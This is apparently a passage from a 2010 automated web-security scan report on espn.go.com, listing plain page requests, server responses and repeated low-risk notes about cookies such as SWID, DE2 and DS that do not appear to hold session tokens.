HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:17:27 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN19 Set-Cookie: SWID=4F518DDD-89D5-4083-B683-C54C5CEF326B; path=/; expires=Sat, 13-Nov-2030 18:17:27 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:50:50 GMT Content-Length: 69266 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:17:27 GMT; Path=/; Domain=.go.com Set-Cookie: DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 18:17:28 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mlb/clubhouse HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:00:43 GMT Location: http://espn.go.com/mlb/teams Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Set-Cookie: SWID=09753397-7395-4AF0-BFBF-AC34402C8D19; path=/; expires=Sat, 13-Nov-2030 18:00:43 GMT; domain=.go.com; Content-Length: 173 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://espn.go.com/mlb/teams ">http://espn.go.com/mlb/teams </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mlb/format/design09/index/playerRatingsTopTen HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 17:59:17 GMT Content-Type: text/html Last-Modified: Sat, 13 Nov 2010 17:59:17 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN05 Set-Cookie: SWID=B9CEA655-9A94-4F2F-A70E-460FFB357DF2; path=/; expires=Sat, 13-Nov-2030 17:59:17 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:00:17 GMT Content-Length: 1762 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mlb/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 17:58:54 GMT Content-Type: text/html Last-Modified: Sat, 13 Nov 2010 17:58:54 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN05 Set-Cookie: SWID=53C7807D-FFC5-42D2-8CF5-D01AEAA1D0B2; path=/; expires=Sat, 13-Nov-2030 17:58:54 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:59:54 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mlb/players/profile HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:59:50 GMT Location: http://espn.go.com/mlb/ Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Set-Cookie: SWID=51009071-0137-4BEA-8086-A7C8364936C9; path=/; expires=Sat, 13-Nov-2030 17:59:50 GMT; domain=.go.com; Content-Length: 163 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://espn.go.com/mlb/ ">http://espn.go.com/mlb/ </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nba/clubhouse HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:44:37 GMT Location: /nba/teams Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Set-Cookie: SWID=E40B6BD4-9A48-47AF-91F7-E8198A246C97; path=/; expires=Sat, 13-Nov-2030 17:44:37 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/nba/teams ">/nba/teams </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nba/conversation HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:46:09 GMT Location: /nba/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN09 Set-Cookie: SWID=1C7FCA27-5BE9-49CB-ADD9-9FB9ECF456B0; path=/; expires=Sat, 13-Nov-2030 17:46:09 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/nba/index ">/nba/index </A>.<BODY></HTML>
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:55:33 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /nba/gamecast HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:55:33 GMT Content-Type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Set-Cookie: SWID=CE391CE2-1247-4E75-9651-8E3774C2B870; path=/; expires=Sat, 13-Nov-2030 17:55:32 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:56:32 GMT Content-Length: 10388 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:55:33 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nba/players/profile HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:55:00 GMT Location: /nba/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Set-Cookie: SWID=03916822-F283-4D96-97C4-D8552E8F65FF; path=/; expires=Sat, 13-Nov-2030 17:55:00 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/nba/index ">/nba/index </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nba/preview HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:46:10 GMT Location: /nba/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN34 Set-Cookie: SWID=9E3B173E-3D3E-4373-B442-5153ABAA6A36; path=/; expires=Sat, 13-Nov-2030 17:46:10 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/nba/index ">/nba/index </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nba/recap HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:46:15 GMT Location: /nba/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Set-Cookie: SWID=244A3381-CCFB-40FD-96CE-C5D1FE4DA983; path=/; expires=Sat, 13-Nov-2030 17:46:15 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/nba/index ">/nba/index </A>.<BODY></HTML>
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:15 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /nba/schedule HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:44:15 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Set-Cookie: SWID=AEF4146B-D529-448B-8614-6DB92B9DB4DC; path=/; expires=Sat, 13-Nov-2030 17:44:15 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:44:43 GMT Content-Length: 71849 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:15 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nba/shotchart HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:50:21 GMT Location: /nba/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Set-Cookie: SWID=6C386EB4-B99E-4F1F-B299-51A3CC80DAE8; path=/; expires=Sat, 13-Nov-2030 17:50:21 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/nba/index ">/nba/index </A>.<BODY></HTML>
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:32 GMT; Path=/; Domain=.go.com
DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 17:44:32 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /nba/truehoop/miamiheat/ HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:44:32 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Set-Cookie: SWID=A36C7A92-BD02-4CA4-9B32-CCDC3852BDE9; path=/; expires=Sat, 13-Nov-2030 17:44:32 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:40:51 GMT Content-Length: 192983 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:32 GMT; Path=/; Domain=.go.com Set-Cookie: DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 17:44:32 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nfl/clubhouse HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:56:20 GMT Location: /nfl/teams Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN35 Set-Cookie: SWID=6979213A-5F48-4FFF-AB25-B2C27D5965D8; path=/; expires=Sat, 13-Nov-2030 17:56:20 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/nfl/teams ">/nfl/teams </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nfl/feature/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 504 Gateway Timeout Date: Sat, 13 Nov 2010 17:58:32 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Set-Cookie: SWID=87BF7091-A53D-4F45-B2BD-DF79FB4CE47E; path=/; expires=Sat, 13-Nov-2030 17:58:32 GMT; domain=.go.com; Content-Length: 794 Connection: close X-UA-Compatible: IE=EmulateIE7
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ESPN - Not Fou ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:58:52 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /nfl/mnf HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:58:51 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Set-Cookie: SWID=AFD7983B-8389-49D6-AD14-097781E023FF; path=/; expires=Sat, 13-Nov-2030 17:58:51 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:36:41 GMT Content-Length: 83888 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:58:52 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nfl/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Date: Sat, 13 Nov 2010 17:55:57 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:08:50 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Set-Cookie: SWID=B8A2F562-3187-44FD-8521-715A53882AA6; path=/; expires=Sat, 13-Nov-2030 17:55:57 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:15:50 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nhl/boxscore HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:02:53 GMT Location: http://sports.espn.go.com/nhl/scoreboard Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN19 Set-Cookie: SWID=BAB1F0F5-CD4E-4C29-B71E-938DC1274297; path=/; expires=Sat, 13-Nov-2030 18:02:53 GMT; domain=.go.com; Content-Length: 197 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://sports.espn.go.com/nhl/scoreboard ">http://sports.espn.go.com/nhl/scoreboard </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nhl/clubhouse HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:01:41 GMT Location: http://espn.go.com/nhl/teams Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Set-Cookie: SWID=C65628F9-CABD-4CE9-A514-0E9FB78BAE32; path=/; expires=Sat, 13-Nov-2030 18:01:41 GMT; domain=.go.com; Content-Length: 173 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://espn.go.com/nhl/teams ">http://espn.go.com/nhl/teams </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nhl/gamecast HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:02:42 GMT Location: http://sports.espn.go.com/nhl/scoreboard Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Set-Cookie: SWID=D07E910B-61AD-4221-A836-9E1F3D272A50; path=/; expires=Sat, 13-Nov-2030 18:02:42 GMT; domain=.go.com; Content-Length: 197 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://sports.espn.go.com/nhl/scoreboard ">http://sports.espn.go.com/nhl/scoreboard </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nhl/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 18:01:24 GMT Content-Type: text/html Last-Modified: Sat, 13 Nov 2010 18:01:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Set-Cookie: SWID=A45895D3-70CF-4BE2-9BFB-72D449C31553; path=/; expires=Sat, 13-Nov-2030 18:01:24 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:02:02 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nhl/players/profile HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:03:22 GMT Location: http://espn.go.com/nhl/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN05 Set-Cookie: SWID=1B0C3156-48B1-4DF8-B807-BC37F5366A67; path=/; expires=Sat, 13-Nov-2030 18:03:22 GMT; domain=.go.com; Content-Length: 173 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://espn.go.com/nhl/index ">http://espn.go.com/nhl/index </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nhl/recap HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:03:09 GMT Location: http://sports.espn.go.com/nhl/scoreboard Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Set-Cookie: SWID=A18FD989-2422-4D90-A5FD-E628C4F5AE0F; path=/; expires=Sat, 13-Nov-2030 18:03:09 GMT; domain=.go.com; Content-Length: 197 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://sports.espn.go.com/nhl/scoreboard ">http://sports.espn.go.com/nhl/scoreboard </A>.<BODY></HTML>
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:38 GMT; Path=/; Domain=.go.com
DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 18:16:38 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /poker/ HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
